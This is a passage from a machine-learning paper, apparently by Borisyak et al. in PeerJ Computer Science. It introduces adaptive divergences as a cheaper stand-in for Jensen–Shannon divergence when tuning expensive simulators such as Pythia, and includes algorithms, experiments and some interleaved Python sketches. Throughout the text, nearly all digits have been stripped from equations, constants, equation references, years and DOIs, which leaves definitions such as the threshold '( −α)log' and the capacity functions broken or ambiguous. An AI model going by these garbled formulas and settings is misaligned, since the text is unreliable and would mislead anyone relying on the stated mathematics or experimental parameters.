simplest one is to define a nested family of models m={mα⊆f|α∈[ , ]}, (e.g., by changing number of hidden units of a neural network), then use pseudo-divergence eq. ( ) to form a desired family. 
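a minimal sketch of this nested-family construction, assuming scikit-learn and using the width of a one-hidden-layer network as the capacity knob; the mapping from α to the number of hidden units and the helper name pseudo_divergence are our own choices for the illustration, and training noise can break strict monotonicity in practice.

import numpy as np
from sklearn.metrics import log_loss
from sklearn.model_selection import train_test_split
from sklearn.neural_network import MLPClassifier

def pseudo_divergence(x_p, x_q, alpha, max_units=64):
    # D_alpha(p, q) = log(2) - min over M_alpha of L(f, p, q), where M_alpha
    # is a nested family: alpha = 0 is the constant classifier f = 1/2 and
    # larger alpha unlocks wider (more capable) networks.
    if alpha <= 0.0:
        return 0.0  # the constant classifier attains exactly L = log(2)
    n_units = max(1, int(round(alpha * max_units)))
    X = np.vstack([x_p, x_q])
    y = np.concatenate([np.ones(len(x_p)), np.zeros(len(x_q))])
    X_tr, X_val, y_tr, y_val = train_test_split(X, y, test_size=0.5, stratify=y)
    clf = MLPClassifier(hidden_layer_sizes=(n_units,), max_iter=500)
    clf.fit(X_tr, y_tr)
    ce = log_loss(y_val, clf.predict_proba(X_val)[:, 1], labels=[0, 1])
    return max(np.log(2.0) - ce, 0.0)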
alternatively, for a parameterized model m ={f (θ,·)|θ ∈ }, one can use a regularization r(θ) to control ‘capacity’ of the model: dα(p,q)= log −l(f (θ ∗ ,·),p,q); ( ) θ ∗ = arg minθ∈ l(f (θ,·),p,q)+c( −α)·r(θ); where c : [ , ]→[ ,+∞) is a strictly increasing function and c( )= . the third, boosting-based method is applicable for a discrete approximation: dc(i)(p,q)= log −l(fi,p,q); ( ) fi =fi− +ρ ·arg minf∈bl(fi− +f ,p,q); f ≡ ; where: ρ —learning rate, b —base estimator, c :z+→[ , ] —a strictly increasing function for mapping ensemble size onto α∈[ , ]. borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. although definition is quite general, in this paper, we focus on families of pseudo- divergence produced in a manner similar to the examples above. all these examples introduce a classification algorithm parameterized by α, then define pseudo-divergences dα by substituting the optimal discriminator in equation eq. ( ) with the discriminator trained in accordance with this classification algorithm with the parameter α. of course, one has to make sure that the resulting family of pseudo-divergences is ordered and complete w.r.t. jensen–shannon divergence. appendix provides formal definitions and proofs for the examples above. with this class of pseudo-divergences in mind, we refer to α as capacity of the pseudo- divergence dα ∈d relative to the family d, or simply as capacity if the family d is clear from the context. in the examples above, capacity of pseudo-divergence is directly linked to the capacity of underlying discriminator models: to the size of the model in equation eq. ( ), to the strength of the regularization in equation eq. ( ) (which, similar to the previous case, effectively restricts the size of the set of feasible models) or to the size of the ensemble for a boosting-based family of divergences in equation eq. ( ). finally, we introduce a function that combines a family of pseudo-divergences into a single divergence. definition if a family of pseudo-divergences d={dα|α∈[ , ]} is ordered and complete with respect to jensen–shannon divergence, then adaptive divergence add produced by d is defined as: add(p,q)= inf { dα(p,q)|dα(p,q)≥( −α)log } . ( ) we omit index in add when the family d is clear from the context or is not important. a linear ‘threshold’ function τ(α)= −α is used in the definition, however, it can be replaced by any strictly decreasing τ : [ , ]→[ , ], such that τ( )= and τ( )= : add(p,q)= inf { dα(p,q)|dα(p,q)≥τ(α)log } , ( ) but, since one can redefine the family d as d′={dτ(α)|α∈[ , ]}, this effectively leads to the same definition. nevertheless, it might be convenient in practice to use τ other than τ(α)= −α as most model families have a natural ordering, e.g., regularization strength. the coefficient log naturally arises as the maximal value of jensen–shannon divergence as well as an upper bound of any pseudo-divergence based on equation eq. ( ) if the function f (x)= / is included in the underlying classification model m. since almost all popular models are capable of learning constant estimators, log is included in the definition. nevertheless, to adopt definition for exotic models or divergences other than jensen–shannon (e.g., wasserstein distance), this coefficient (and, possibly, the ‘threshold’ function) should be reconsidered. note, that due to property (d ), dα(p,q) is a non-decreasing function of α, while ( −α)log is a strictly decreasing one. 
hence, if family d is such that for any two distributions p and q dα(p,q) is continuous w.r.t. α, equation eq. ( ) can be simplified: add(p,q)=dα∗(p,q), ( ) borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm general procedure for computing an adaptive divergence by grid search require: d={dα|α∈[ , ]}— ordered and complete w.r.t. jensen-shannon divergence family of pseudo-divergences; ε — tolerance; p, q — input distributions α← ; while dα(p,q)<( −α)log do α←α+ε end while return dα(p,q) where α∗ is the root of the following equation: dα(p,q)=( −α)log . ( ) a general procedure for computing add for this case is outlined in algorithm . intuitively, an adaptive divergence add switches between members of d depending on the ‘difficulty’ of separating p and q. for example, consider family d produced by equation eq. ( ) with a high-capacity neural network as model m and l regularization r on its weights. for a pair of distant p and q, even a highly regularized network is capable of achieving low cross-entropy loss and, therefore, add takes values of the pseudo-divergence based on such network. as distribution q moves close to p, add lowers the regularization coefficient, effectively increasing the capacity of the underlying model. the idea behind adaptive divergences can be viewed from a different angle. given two distributions p and q, it scans the producing family of pseudo-divergences, starting from α= (the least powerful pseudo-divergence), and if some pseudo-divergence reports high enough value, it serves as a ‘proof’ of differences between p and q. if all pseudo-divergences from the family d report , then p and q are equal almost everywhere as the family always includes jsd as a member. formally, this intuition can be expressed with the following theorem. theorem if add is an adaptive divergence produced by an ordered and complete with respect to jensen–shannon divergence family of pseudo-divergences d, then for any two distributions p and q: jsd(p,q)= if and only if ad(p,q)= . a formal proof of theorem can be found in appendix a . combined with the observation that ad(p,q)≥ regardless of p and q, the theorem states that ad is a divergence in the same sense as jsd. this, in turn, allows to use adaptive divergences as a replacement for jensen–shannon divergence in adversarial optimization. as can be seen from the definition, adaptive divergences are designed to utilize low- capacity pseudo-divergences (with underlying low-capacity models) whenever it is possible: for a pair of distant p and q one needs to train only a low-capacity model to estimate ad, using the most powerful model only to prove equality of distributions. as low-capacity models generally require fewer samples for training, ad allows an optimization algorithm to run for more iterations within the same time restrictions. properties of add highly depend on the family d, and choice of the latter might either negatively or positively impact convergence of a particular optimization algorithm. borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . . . . . . . . . . generator ground-truth a . . . . . . . rotation angle . . . . . . . di ve rg en ce jsd linear ad logarithmic ad b . . . . . . . rotation angle . . . . . . . . . di ve rg en ce jsd ad, dropout ad, l c generator ground-truth d . . . . . . . . rotation angle . . . . . . . . di ve rg en ce jsd linear ad logarithmic ad e . . . . . . . . 
rotation angle . . . . . . . . di ve rg en ce jsd ad, dropout ad, l f figure synthetic examples. (a) and (d): ground-truth distributions and example configurations of generators. both generators are rotated versions of the corresponding ground-truth distributions. (b) and (e): jsd—jensen–shannon divergences estimated by gradient boosted decision trees with trees of depth (b), trees of depth (e); linear ad and logarithmic ad—adaptive divergences based on the same models as jsd with linear and logarithmic capacity functions, dashed lines represent some pseudo- divergences from the families producing adaptive divergences. (c) and (f): jsd —jensen–shannon di- vergences estimated by fully-connected neural networks with one hidden layer with units (c) and units (f); ad, dropout and ad, l —adaptive divergences based on the same architectures as the one for jsd, with dropout and l regularizations; dashed lines represent some of the pseudo-divergences from the dropout-produced family. see ‘implementation’ for the implementation details. full-size doi: . /peerjcs. /fig- figure demonstrates both cases: here, we evaluate jsd and four variants of add on two synthetic examples. in each example, the generator produces a rotated version of the ground-truth distribution and is parameterized by the angle of rotation (ground-truth distributions and examples of generator distributions are shown in figs. a and d). in figs. b and c ad shows behavior similar to that of jsd (both being monotonous and maintaining a significant slope in the respective ranges). in fig. e, both variants of ad introduce an additional local minimum: as the rotation angle approaches π/ , marginal feature distributions become identical, which interferes with decision-tree-based algorithms (this is especially pronounced for ad with logarithmic capacity function as it prioritizes low-capacity models). this behavior is expected to impact convergence of gradient-based algorithms negatively. in contrast, in fig. f neural-network-based ad with l regularization stays monotonous in the range [ ,π/ ] and keeps a noticeable positive slope, in contrast to saturated jsd. the positive slope is expected to improve convergence of gradient-based algorithms and, possibly, some variants of bayesian optimization. in contrast, neural-network-based borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. technically, this function should be extended on [ ,+∞) to be in agreement with definition . note that introducing a continuous approximation of the ensemble by, for example, varying learning rate for the last base estimator in the current ensemble from to ρ, eliminates discontinuity of ad. ad with dropout regularization behaves in a manner similar to adaptive divergences in fig. e. the most likely explanation is that l regularization mostly changes magnitude of the predictions without significantly affecting the decision surface and, therefore, largely replicates behavior of jsd, while dropout effectively lowers the number of units in the network, which biases the decision surface towards a straight line (i.e., towards logistic regression). implementation a general algorithm for computing an adaptive divergence is presented in algorithm . this algorithm might be an expensive procedure as the algorithm probes multiple pseudo-divergences, and for each of these probes, generally, a model needs to be trained from scratch. 
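for reference, the grid-search procedure shown above translates into a few lines of python; the sketch below is our own illustration, assumes the pseudo_divergence helper from the earlier example, and makes the cost visible: every probed capacity retrains a discriminator from scratch, which is exactly what the more efficient estimators in the next subsections avoid.

import numpy as np

def adaptive_divergence_grid(x_p, x_q, pseudo_divergence, eps=0.05):
    # Scan capacities alpha = 0, eps, 2*eps, ... and return the first
    # pseudo-divergence that reaches the threshold (1 - alpha) * log(2);
    # if none does, the full-capacity estimate (alpha = 1) is returned.
    alpha = 0.0
    d = pseudo_divergence(x_p, x_q, alpha)
    while d < (1.0 - alpha) * np.log(2.0) and alpha < 1.0:
        alpha = min(alpha + eps, 1.0)
        d = pseudo_divergence(x_p, x_q, alpha)  # full retraining per probe
    return d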
however, two of the most commonly used machine learning models, boosting-based methods (friedman, ) and neural networks, allow for more efficient estimation algorithms due to the iterative nature of training procedures for such models. gradient boosted decision trees gradient boosted decision trees (friedman, ) (gbdt) and, generally, boosting- based methods, being ensemble methods, intrinsically produce an ordered and complete with respect to jensen–shannon divergence family of pseudo-divergences in the manner similar to equation eq. ( ). this allows for an efficient ad estimation procedure shown by algorithm . here, the number of base estimators serves as capacity of pseudo- divergences, and mapping to α∈[ , ] is defined through an increasing capacity function c :z+→[ , ]. in our experiments, for ensembles of maximal size n , we use the following capacity functions: linear capacity: c(i)=c i n ; ( ) logarithmic capacity: c(i)=c log(i+ ) log(n + ) . ( ) notice, however, that equation eq. ( ) defines a discrete variant of ad, which most certainly will result in a discontinuous function. this effect can be seen on fig. e. neural networks there is a number of ways to regulate the capacity of a neural network. one of the simplest options is to vary the total number of units in the network. this, however, would almost certainly result in a discontinuous adaptive divergence, similarly to gradient boosted decision trees (fig. e), which is not ideal even for black-box optimization procedures. in this work, we instead use well-established dropout regularization srivastava et al. ( ). effects of dropout are somewhat similar to varying number of units in a network, but at the same time dropout offers a continuous parametrization—it is clear that setting dropout probability p to results in an unregularized network, while p= effectively restricts classifier to a constant output and intermediate values of p produce models in between these extreme cases. to produce a family of pseudo-divergences we equip dropout borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm boosted adaptive divergence require: xp, xq — samples from distributions p and q, b — base estimator training al- gorithm, n — maximal size of the ensemble, c :z+→[ , ]— capacity function; ρ — learning rate; f ← / i← l ← log for i= ,...,n do if li >c(i)log then fi+ ←fi+ρ ·b(fi,xp,xq) li+ ←l(fi+ ,xp,xq) i← i+ else return log −li end if end for return log −ln regularization with a linear capacity function: c(α)= −α, where α corresponds to dropout probability p. methods with explicit regularization terms can also be used to produce a family of pseudo-divergences. in this work, we examine l regularization on network weights as one of the most widely used. in this case, a family of pseudo-divergences is defined by equation eq. ( ) with a logarithmic capacity function: c(α)=−log(α). regularization methods mentioned above were selected primarily due to their simplicity and popularity in the field. our experiments indicate that these methods perform well. nevertheless, further studies are required to determine best-performing regularization techniques. in our experiments, we observe that unregularized networks require significantly more samples to be properly trained than regularized ones. 
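returning to the boosted family described earlier in this section, the sketch below illustrates the staged estimation idea with scikit-learn's GradientBoostingClassifier. it is our own simplification, not the authors' code: the ensemble is trained in full and then scanned stage by stage, whereas the listed procedure grows it incrementally and stops training early, and the constant c0 = 0.5 in the capacity functions is an arbitrary placeholder rather than the paper's value. the neural-network variants discussed next follow the same pattern, with the regularization strength playing the role of the ensemble size.

import numpy as np
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.metrics import log_loss
from sklearn.model_selection import train_test_split

def linear_capacity(i, n, c0=0.5):
    return c0 * i / n                              # c(i) = c0 * i / n

def log_capacity(i, n, c0=0.5):
    return c0 * np.log(i + 1) / np.log(n + 1)      # c(i) = c0 * log(i+1)/log(n+1)

def boosted_adaptive_divergence(x_p, x_q, n_estimators=100, max_depth=3,
                                capacity=linear_capacity):
    X = np.vstack([x_p, x_q])
    y = np.concatenate([np.ones(len(x_p)), np.zeros(len(x_q))])
    X_tr, X_val, y_tr, y_val = train_test_split(X, y, test_size=0.5, stratify=y)
    gb = GradientBoostingClassifier(n_estimators=n_estimators, max_depth=max_depth)
    gb.fit(X_tr, y_tr)
    loss = np.log(2.0)
    # Walk through the ensemble stage by stage and stop as soon as the
    # current loss L_i drops to c(i) * log(2) or below, i.e. as soon as
    # log(2) - L_i >= (1 - c(i)) * log(2).
    for i, proba in enumerate(gb.staged_predict_proba(X_val), start=1):
        loss = log_loss(y_val, proba[:, 1], labels=[0, 1])
        if loss <= capacity(i, n_estimators) * np.log(2.0):
            break  # a small ensemble already separates p and q well enough
    return max(np.log(2.0) - loss, 0.0)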
to reduce discriminator variance, we suggest to use additional regularization r, strength of which is independent from the capacity parameter α, e.g.: dα(p,q)= log −l(f (θ ∗ ,·),p,q); ( ) θ ∗ = arg minθ∈ l(f (θ,·),p,q)+c( −α)·r(θ)+r(θ). in this work, following louppe, hermans & cranmer ( ), we use gradient regularization r =r suggested by mescheder, geiger & nowozin ( ). note, that such family of pseudo-divergences is no longer complete w.r.t jensen–shannon divergence, i.e., d = jsd. nevertheless, d is still a proper divergence (mescheder, geiger & nowozin, ) (which closely resembles jsd), and all results in this work hold with respect to such divergences including main theorems and claims, i.e., the family defined above still produces a (generalized) variant of adaptive divergence. borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the proposed procedures for estimating ad is outlined in algorithms and . as chosen regularization methods result in families of pseudo-divergences continuous w.r.t α, the proposed algorithm employs equation eq. ( ), i.e., it varies the strength of the regularization depending on the current values of the cross-entropy. the values of the loss function are estimated with an exponential moving average over losses on mini-batches during iterations of stochastic gradient descent, with the idea that, for slowly changing loss estimations and small enough learning rate, network training should converge (liu, simonyan & yang, ). we find that initializing exponential moving average with log , which corresponds to the absent regularization, works best. algorithm adaptive divergence estimation by a dropout-regularized neural network require: xp, xq — samples from distributions p and q; fθ :x ×r→r — neural network with parameters θ ∈ , the second argument repre- sents dropout probability and is zero if unspecified; c — capacity function; ρ — exponential average coefficient; β — coefficient for r regularization; γ — learning rate of sgd. lacc← log while not converged do xp ←sample(xp) xq←sample(xq) ζ ←c ( − lacclog ) g ←∇θl(fθ(·,ζ),xp,xq) g ←∇θ‖∇θfθ(xp)‖ lacc←ρ ·lacc+( −ρ)·l(fθ,xp,xq) θ←θ−γ ( g +βg ) end while return log −l(fθ,xp,xq) experiments adaptive divergence was designed to require fewer samples than its conventional counterparts. however, for practical purposes, it is meaningless to consider this quantity outside the context of optimization. to illustrate this claim, consider the following divergence: id(p,q)= { , if p =q almost everywhere; , otherwise. such divergence can be estimated in a manner similar to that of adaptive divergence: starting with a low-capacity model, train the model to distinguish between p and q, if the model reports any differences between distributions, return , otherwise increase the borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. code of the experiments is available at https://github.com/hse-lambda/rapid- ao/ this procedure requires generating an additional validation set of the size similar to that of the training set, which might be avoided by, e.g., using bayesian inference, or cross-validation estimates. capacity of the model and repeat, until a sufficiently high capacity is reached, in which case return . 
in terms of the number of samples, id is expected to be more efficient than ad; at the same time, id is a textbook example of intrinsically hard optimization problem, rendering it useless for adversarial optimization. therefore, we judge the performance of adaptive divergence only within an optimization procedure. note that adaptive divergence is not expected to improve the optimization surface; nevertheless, as fig. demonstrates, the improvement is seemingly present in some instances; however, our experiments show that it does not play any significant role (see appendix a for details). in the cases, when degradation of the optimization surface takes place, global optimization procedures, such as bayesian optimization, are still expected to benefit from the usage of ad by being able to perform more steps within the same budget on the number of generator calls. we compare adaptive divergence against jsd on three tasks, each task is presented by a parametrized generator, ’real-world’ samples are drawn from the same generator with some nominal parameters. optimization algorithms are expected to converge to these nominal parameters. we evaluate the performance of adaptive divergences with two black-box optimization algorithms, namely bayesian optimization and adversarial variational optimization. as computational resources spent by simulators are of our primary concern, we measure convergence of adversarial optimization with respect to the number of samples generated by the simulation, which is expected to be roughly proportional to the total time in case of computationally heavy simulations. we chose to neglect the time spent on training models as the proposed methods are intended for simulations that are significantly more computationally intensive than training of any model with a reasonable capacity, for example, running atlas simulation (the atlas collaboration, ) for the same number of times as budgets in our experiments would require several years on a single-core cpu. to measure the number of samples required to estimate a divergence, we search for the minimal number of samples such that the difference between train and validation losses is within − for gradient boosted decision trees and · − for neural networks. as a significant number of samples is involved in loss estimation, for simplicity, we use point estimations of losses. for gbdt, we utilize a bisection root-finding routine to reduce time spent on retraining classifiers; however, for more computationally expensive simulators, it is advised to gradually increase the size of the training set until the criterion is met. for each experiment, we report convergence plots—euclidean distance from the current guess to the nominal parameters as a function of the number of examples generated by the simulator. as the performance of bayesian optimization is influenced by choice of the initial points (in our experiments, points uniformly drawn from the search space), each experiment involving bayesian optimization is repeated times, and aggregated results are reported. similarly, experiments with variational optimization are repeated times each. borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/hse-lambda/rapid-ao/ https://github.com/hse-lambda/rapid-ao/ https://peerj.com http://dx.doi.org/ . /peerj-cs. 
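the sample-size search described above can be sketched as follows; this is our illustration only — the doubling schedule, helper names and default tolerance are placeholders rather than the paper's exact values, and the paper additionally uses a bisection routine for gbdt.

import numpy as np
from sklearn.metrics import log_loss
from sklearn.model_selection import train_test_split

def minimal_sample_size(sample_p, sample_q, make_model, tol=1e-2,
                        n0=256, n_max=65536):
    # sample_p(n) and sample_q(n) draw n points from p and q (e.g. by calling
    # the simulator); make_model() returns a fresh, untrained classifier.
    # The sample grows until the train/validation cross-entropy gap is
    # below `tol`, i.e. until the discriminator no longer overfits.
    n = n0
    while True:
        x_p, x_q = sample_p(n), sample_q(n)
        X = np.vstack([x_p, x_q])
        y = np.concatenate([np.ones(n), np.zeros(n)])
        X_tr, X_val, y_tr, y_val = train_test_split(X, y, test_size=0.5, stratify=y)
        model = make_model()
        model.fit(X_tr, y_tr)
        train_ce = log_loss(y_tr, model.predict_proba(X_tr)[:, 1], labels=[0, 1])
        val_ce = log_loss(y_val, model.predict_proba(X_val)[:, 1], labels=[0, 1])
        if abs(train_ce - val_ce) < tol or n >= n_max:
            return n, val_ce
        n *= 2  # doubling schedule; the paper uses bisection for gbdt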
algorithm adaptive divergence estimation by a regularized neural network require: xp, xq — samples from distributions p and q; fθ :x →r — neural network with parameters θ∈ ; r : →r — regularization function; c — capacity function; ρ — exponential average coefficient; β — coefficient for r regularization; γ — learning rate of sgd. lacc← log while not converged do xp ←sample(xp) xq←sample(xq) ζ ←c ( − lacclog ) g ←∇θ [ l(fθ,xp,xq)+ζ ·r(fθ) ] g ←∇θ‖∇θfθ(xp)‖ lacc←ρ ·lacc+( −ρ)·l(fθ,xp,xq) θ←θ−γ ( g +βg ) end while return log −l(fθ,xp,xq) xor-like synthetic data this task repeats one of the synthetic examples presented in fig. d: ground truth distribution is an equal mixture of two gaussian distributions, the generator produces a rotated version of the ground-truth distribution with the angle of rotation being the single parameter of the generator. the main goal of this example is to demonstrate that, despite significant changes in the shape of the divergence, global optimization algorithms, like bayesian optimization, can still benefit from the fast estimation procedures offered by adaptive divergences. for this task, we use an adaptive divergence based on gradient boosted decision trees ( trees with the maximal depth of ) with linear and logarithmic capacity functions given by eqs. ( ) and ( ) and c = / . gaussian process bayesian optimization with matern kernel (ν= / and scaling from [ − , ] automatically adjusted by maximum likelihood fit) is employed as optimizer. convergence of the considered divergences is shown in fig. . as can be seen from the results, adaptive divergences tend to request fewer generator calls per estimation; and, given the same budget, both variants of adaptive divergence converge on parameters around an order of magnitude closer to the optimum than traditional jsd. notice, that the initial rapid progress slows as optimizer approaches the optimum, and the slope of the curves becomes similar to that of jsd: this can be explained by ad approaching jsd as probed distributions become less distinguishable from the ground-truth one. borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. note, that this task is rather a realistic toy example—in practical settings, pythia event generator is followed by a much more computationally expensive detector simulation such as geant (allison et al., ), the latter translates outcomes of an event generator, such as pythia, into observable values. for comparison, full atlas simulation (event generator and detector simulation) mentioned above takes several minutes per sample, while pythia alone typically require less than a second per event (milliseconds in our settings). number of generator calls eu cl id ea n di st an ce to th e so lu tio n jsd linear ad logarithmic ad a generator calls per optimization step . . . . . . fra ct io n of th e to ta l n um be r o f s te ps jsd linear ad logarithmic ad b figure xor-like synthetic example, gradient boosted decision trees. (a) convergence of bayesian optimization on: jensen–shannon divergence (marked as jsd), adaptive divergences with a linear capac- ity function (marked as linear ad), and a logarithmic capacity function (logarithmic ad). each experi- ment was repeated times; curves are interpolated, median curves are shown as solid lines, bands indi- cate th and th percentiles. 
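to make the setup concrete, the following end-to-end sketch shows how such an adaptive divergence can be plugged into gaussian-process bayesian optimization over the rotation angle. it is only loosely modelled on this task: the mixture layout, noise scale and call budget are placeholders chosen by us, it reuses the boosted_adaptive_divergence helper sketched earlier, and it relies on scikit-optimize's gp_minimize, whose default kernel is a matérn kernel.

import numpy as np
from skopt import gp_minimize

def sample_mixture(n, angle=0.0, rng=None):
    # Equal mixture of two 2-d Gaussians, rotated by `angle`;
    # angle = 0 plays the role of the ground-truth configuration.
    if rng is None:
        rng = np.random.default_rng(0)
    centers = np.array([[1.0, 1.0], [-1.0, -1.0]])
    x = centers[rng.integers(0, 2, size=n)] + 0.3 * rng.standard_normal((n, 2))
    c, s = np.cos(angle), np.sin(angle)
    return x @ np.array([[c, -s], [s, c]]).T

x_real = sample_mixture(5000, angle=0.0)

def objective(params):
    angle, = params
    x_gen = sample_mixture(5000, angle=angle)           # one "simulator" call
    return boosted_adaptive_divergence(x_real, x_gen)   # black-box objective

result = gp_minimize(objective, dimensions=[(0.0, float(np.pi / 2))], n_calls=30)
print("recovered rotation angle:", result.x[0])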
(b) distribution of computational costs per single optimization step mea- sured by the number of generator calls requested for divergence estimation; each optimization step re- quires exactly one divergence estimation; note logarithmic scaling of the x-axis. full-size doi: . /peerjcs. /fig- pythia hyper-parameter tuning this task is introduced by ilten, williams & yang ( ) and involves tuning hyper- parameters of the pythia event generator, a high-energy particle collision simulation used at cern. for this task, electron-positron collisions are simulated at a center-of-mass energy . gev. as initial electron and positron collide and annihilate, new particles are created, some of which are unstable and might decay into more stable particles. a collision event is described by the properties of the final (stable) products. this process is intrinsically stochastic (due to the laws of physics) and covers a large space of possible outcomes, moreover, even with relatively large changes in generator’s hyper-parameters, outcome distributions overlap significantly, which makes it an excellent example for adversarial optimization. the nominal parameters of the pythia event generator are set to the values of the monash tune (skands, carrazza & rojo, ). in work by ilten, williams & yang ( ), various physics-motivated statistics of events are used as observables, with a total of more than features. the same statistics were originally used to obtain the monash tune. for the purposes of the experiment, we consider one hyper-parameter, namely alphasvalue, with the nominal value of . and search range [ . , . ]. we repeat settings of the experiment described by ilten, williams & yang ( ). we employ gradient boosting over oblivious decision trees (catboost implementation by prokhorenkova et al., ) with trees of depth and other parameters set to their default values. we use gaussian process bayesian optimization with matern kernel (ν= / and borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. methods proposed by ilten, williams & yang ( ) compare a fixed set of statistics computed over multiple examples. as adversarial methods operate with individual examples, we use the same statistics computed for single events, i.e., original data can be recovered from ours by simply averaging across events. number of generator calls eu cl id ea n di st an ce to th e so lu tio n jsd linear ad logarithmic ad a generator calls per optimization step . . . . . . fra ct io n of th e to ta l n um be r o f s te ps jsd linear ad logarithmic ad b figure pythia hyper-parameter tuning, catboost. (a) convergence of bayesian optimization on: jensen–shannon divergence (marked as jsd), adaptive divergences with a linear capacity function (marked as linear ad), and a logarithmic capacity function (logarithmic ad). each experiment was repeated times, curves are interpolated, median curves are shown as solid lines, bands indicate th and th percentiles. (b) distribution of computational costs per single optimization step measured by the number of generator calls requested for divergence estimation; each optimization step requires exactly one divergence estimation; note logarithmic scaling of the x-axis. full-size doi: . /peerjcs. /fig- scaling from [ − , ] automatically adjusted by maximum likelihood fit) as optimizer. 
comparison of unmodified jensen–shannon divergence with adaptive divergences with linear and logarithmic capacity functions (defined by eqs. ( ) and ( ) and c = / ) presented onfig. . results, shown in fig. , indicate that, given the same budget, bayesian optimization over adaptive divergences yields solutions about an order of magnitude closer to the nominal value than jensen–shannon divergence. this acceleration can be attributed to the proposed estimation procedures that require far fewer generator calls than jsd. additionally, notice that the slope of the convergence curves for ad gradually approaches that of ad as the proposal distributions become closer to the ground-truth one. pythia alignment in order to test the performance of adaptive divergences with adversarial variational optimization, we repeat the pythia-alignment experiment suggested by louppe, hermans & cranmer ( ). the settings of this experiment are similar to the previous one. in this experiment, however, instead of collecting physics-motivated statistics, we consider a simplified detector simulation, represented by a × spherical grid with cells uniformly distributed in pseudorapidity ν∈[− , ] and azimuthal angle φ∈[−π,π] space. each cell of the detector records the energy of particles passing through it. the detector has parameters: x,y,z-offsets of the detector center relative to the collision point, where z-axis is placed along the beam axis, the nominal offsets are zero, and the initial borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. a b c d e f g h figure illustration of the pythia-alignment task. (a) aggregated events for zero offset (the nomi- nal configuration), . offset along x-axis (b), y-axis (c), and z-axis (d). (e–h) single-event examples from the corresponding configurations above—each activated pixel indicate a particle or multiple particles passing trough the corresponding region of the detector. full-size doi: . /peerjcs. /fig- guess is ( . , . , . ). figure shows averaged detector responses for the example configurations and samples from each of these configurations. for this task, a -hidden-layer neural network with hidden units and relu activation function is employed. r regularization, proposed by mescheder, geiger & nowozin ( ), with the coefficient , is used for the proposed divergences and the baseline. adam optimization algorithm (kingma & ba, ) with learning rate − is used to perform updates of the search distribution. we compare the performance of two variants of adaptive divergence (dropout and l regularization) described in ‘implementation’. results are shown in fig. . adaptive divergences require considerably fewer samples for their estimation than the baseline divergence with only r regularization, which, given the same budget, allows both variants of adaptive divergence to accelerate adversarial optimization significantly. note that the acceleration is even more pronounced in comparison to jsd estimated by an unregularized network: in our experiments, to achieve the set level of agreement between train and test losses, the unregularized network often requires more samples than the entire budget. discussion to the best knowledge of the authors, this work is the first one that explicitly addresses computational costs of adversarial optimization for expensive generators. 
interestingly, several recent developments, like progressive gan (karras et al., ) and chaingan (hossain et al., ), use multiple discriminators of increasing capacity; however, this is done mainly to compensate for the growing capacity of the generators and, probably, not for reducing computational costs. borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. number of generator calls × × × × eu cl id ea n di st an ce to th e so lu tio n jsd ad, dropout ad, l a generator calls per optimization step . . . . . . fra ct io n of th e to ta l n um be r o f s te ps jsd ad, dropout ad, l b figure pythia-alignment, neural networks. (a) convergence of adversarial variational optimization on: adaptive divergence produced by l regularization (ad, l ), dropout regularization (ad, dropout), and the baseline divergence with constant r regularization (marked as jsd). each experiment was repeated times, curves are interpolated, median curves are shown by solid lines, bands indicate th and th per- centiles; steps-like patterns are interpolation artifacts. (b) distribution of computational costs per single optimization step measured by the number of generator calls requested for divergence estimation; each optimization step requires exactly one divergence estimation; note logarithmic scaling of the x-axis. full-size doi: . /peerjcs. /fig- several recent papers propose improving stability of adversarial optimization by employing divergences other than jensen–shannon (gulrajani et al., ; arjovsky, chintala & bottou, ; bellemare et al., ). note that all results in this paper also hold for any divergence that can be formulated as an optimization problem, including wasserstein (arjovsky, chintala & bottou, ) and cramer (bellemare et al., ) distances. it can be demonstrated by adjusting definition and repeating the proof of theorem for a new divergence; presented algorithms also require only minor adjustments. multiple works introduce regularization (sønderby et al., ; arjovsky, chintala & bottou, ; roth et al. ; kodali et al., ; mescheder, geiger & nowozin, ) for improving stability and convergence of adversarial optimization. most of the standard regularization methods can be used to regulate model capacity in adaptive divergences. also, one can use these regularization methods in addition to adaptive divergence as any discriminator-based regularization effectively produces a new type of divergence. pythia-alignment experiment (‘pythia alignment’) demonstrates it clearly, where we use r regularization with constant coefficient in addition to varying-strength dropout and l regularization. as we discussed in ‘adaptive divergence’, properties of adaptive divergences highly depend on the underlying families of pseudo-divergences; the impact of various regularization schemes is a subject of future research. borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. conclusion in this work, we introduce adaptive divergences, a family of divergences meant as an alternative to jensen–shannon divergence for adversarial optimization. adaptive divergences generally require smaller sample sizes for estimation, which allows for a significant acceleration of adversarial optimization algorithms. 
